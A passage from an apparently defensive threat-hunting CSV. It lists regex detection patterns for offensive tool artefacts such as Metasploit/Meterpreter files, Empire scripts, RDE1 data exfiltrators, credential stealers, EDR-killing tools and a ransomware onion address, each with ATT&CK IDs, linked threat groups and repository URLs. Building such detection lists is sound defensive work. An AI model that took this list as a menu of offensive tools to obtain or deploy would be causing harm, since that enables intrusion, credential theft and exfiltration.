security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","51902" "*metasploitframework-latest.msi*",".{0,1000}metasploitframework\-latest\.msi.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","1","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","51903" "*MetasploitPayload.ps1*",".{0,1000}MetasploitPayload\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1149","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","51904" "*MetasploitSelfSignedCA*",".{0,1000}MetasploitSelfSignedCA.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","https://github.com/rapid7/metasploit-framework","1","1","#certificate","default SSL cert","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","51905" 
"*metatwin.ps1*",".{0,1000}metatwin\.ps1.{0,1000}","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/threatexpress/metatwin","1","1","N/A","N/A","9","4","345","71","2024-11-19T19:45:59Z","2017-10-08T13:26:00Z","51906" "*metatwin-master*",".{0,1000}metatwin\-master.{0,1000}","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/threatexpress/metatwin","1","1","N/A","N/A","9","4","345","71","2024-11-19T19:45:59Z","2017-10-08T13:26:00Z","51907" "*meterpeter.ps1*",".{0,1000}meterpeter\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","51908" "*Meterpeter_$RandMe.zip*",".{0,1000}Meterpeter_\$RandMe\.zip.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - 
T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","51909" "*meterpreter*.rb*",".{0,1000}meterpreter.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","51910" "*meterpreter.*",".{0,1000}meterpreter\..{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","51911" "*Meterpreter.java*",".{0,1000}Meterpreter\.java.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","FIN11 - FIN7 - Silence group - 
MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/BeichenDream/Godzilla","1","1","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","51912" "*Meterpreter.ps1*",".{0,1000}Meterpreter\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","51913" "*meterpreter.sl*",".{0,1000}meterpreter\.sl.{0,1000}","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla - Black Basta","Exploitation tool","https://github.com/r00t0v3rr1d3/armitage","1","1","N/A","N/A","N/A","2","129","32","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z","51914" "*meterpreter_*.rb",".{0,1000}meterpreter_.{0,1000}\.rb","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","51915" "*meterpreter_loader*",".{0,1000}meterpreter_loader.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","51916" "*METERPRETER_STAGER*",".{0,1000}METERPRETER_STAGER.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","51917" "*meterpreter-in-go.exe*",".{0,1000}meterpreter\-in\-go\.exe.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","Defense 
Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","1","N/A","N/A","10","9","840","147","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z","51918" "*MeteTool*",".{0,1000}MeteTool.{0,1000}","offensive_tool_keyword","MeteTool","Metatool Minetest mod provides API for registering metadata manipulation tools and other tools primarily focused on special node data operations.","T1059.003 - T1064 - T1135 - T1059.007","TA0002 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/S-S-X/metatool","1","0","N/A","N/A","N/A","1","2","1","2024-07-30T00:22:07Z","2020-05-09T19:09:17Z","51919" "*methodHash*528465795*",".{0,1000}methodHash.{0,1000}528465795.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/dr4k0nia/NixImports","1","0","N/A","N/A","N/A","3","207","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z","51920" "*methods::dns::dns_exfiltrator*",".{0,1000}methods\:\:dns\:\:dns_exfiltrator.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","51921" "*methods::https::https_exfiltrator*",".{0,1000}methods\:\:https\:\:https_exfiltrator.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","51922" 
"*methods::icmp::icmp_exfiltrator*",".{0,1000}methods\:\:icmp\:\:icmp_exfiltrator.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","51923" "*Metro-Holografix/CSExec*",".{0,1000}Metro\-Holografix\/CSExec.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","N/A","private github repo","10","","N/A","","","","51924" "*Metro-Holografix/Dinjector*",".{0,1000}Metro\-Holografix\/Dinjector.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","1","N/A","private github repo","8","","N/A","","","","51925" "*metsrv.dll*",".{0,1000}metsrv\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","51926" "*metsvc-server.exe*",".{0,1000}metsvc\-server\.exe.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","service file name","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","51927" "*metterpreter*",".{0,1000}metterpreter.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","1","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","51928" "*mez-0/DecryptRDCManager*",".{0,1000}mez\-0\/DecryptRDCManager.{0,1000}","offensive_tool_keyword","DecryptRDCManager","decrypts passwords stored in Remote Desktop Connection Manager (RDCMan) using DPAPI","T1003 - T1552 - T1081 - T1027","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/mez-0/DecryptRDCManager","1","1","N/A","N/A","8","1","73","7","2020-09-29T10:12:58Z","2020-09-29T08:53:46Z","51929" "*MFASweep.ps1*",".{0,1000}MFASweep\.ps1.{0,1000}","offensive_tool_keyword","MFASweep","A tool for checking if MFA is enabled on multiple Microsoft Services","T1595 - T1595.002 - T1078.003 - T1621","TA0006 - TA0009","N/A","N/A","Exploitation 
tool","https://github.com/dafthack/MFASweep","1","1","N/A","N/A","9","10","1484","203","2025-03-04T20:36:41Z","2020-09-22T16:25:03Z","51930" "*mfgccjchihfkkindfppnaooecgfneiii*",".{0,1000}mfgccjchihfkkindfppnaooecgfneiii.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","51931" "*mgeeky.tech/protectmytooling/*",".{0,1000}mgeeky\.tech\/protectmytooling\/.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","51932" "*mgeeky/ElusiveMice*",".{0,1000}mgeeky\/ElusiveMice.{0,1000}","offensive_tool_keyword","ElusiveMice","Cobalt Strike User-Defined Reflective Loader with AV/EDR Evasion in mind","T1620 - T1055.012 - T1202","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/mgeeky/ElusiveMice","1","1","N/A","N/A","10","5","449","78","2023-07-12T17:54:07Z","2021-08-27T19:22:20Z","51933" "*mgeeky/PackMyPayload*",".{0,1000}mgeeky\/PackMyPayload.{0,1000}","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","N/A","10","10","912","143","2024-06-10T09:50:43Z","2022-02-08T19:26:28Z","51934" 
"*mgeeky/RedWarden*",".{0,1000}mgeeky\/RedWarden.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","51935" "*mgeeky@commandoVM*",".{0,1000}mgeeky\@commandoVM.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - 
T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","51936" "*mgffkfbidihjpoaomajlbgchddlicgpn*",".{0,1000}mgffkfbidihjpoaomajlbgchddlicgpn.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","51937" "*mhaskar/DNSStager*",".{0,1000}mhaskar\/DNSStager.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","Black Basta","Defense Evasion","https://github.com/mhaskar/DNSStager","1","1","N/A","N/A","10","7","613","133","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z","51938" "*mhaskar/Octopus*",".{0,1000}mhaskar\/Octopus.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. 
pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1059.001 - T1105 - T1071.001 - T1219 - T1573","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","N/A","10","10","750","156","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z","51939" "*mhdehvkomeabau7gsetnsrhkfign4jgnx3wajth5yb5h6kvzbd72wlqd.onion*",".{0,1000}mhdehvkomeabau7gsetnsrhkfign4jgnx3wajth5yb5h6kvzbd72wlqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51940" "*mhuzaifi0604/spellbound*",".{0,1000}mhuzaifi0604\/spellbound.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","1","N/A","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z","51942" "*mhydeath.exe*",".{0,1000}mhydeath\.exe.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","Black Basta","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","N/A","10","4","397","71","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z","51943" "*mhydeath-master*",".{0,1000}mhydeath\-master.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","Black Basta","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","N/A","10","4","397","71","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z","51944" 
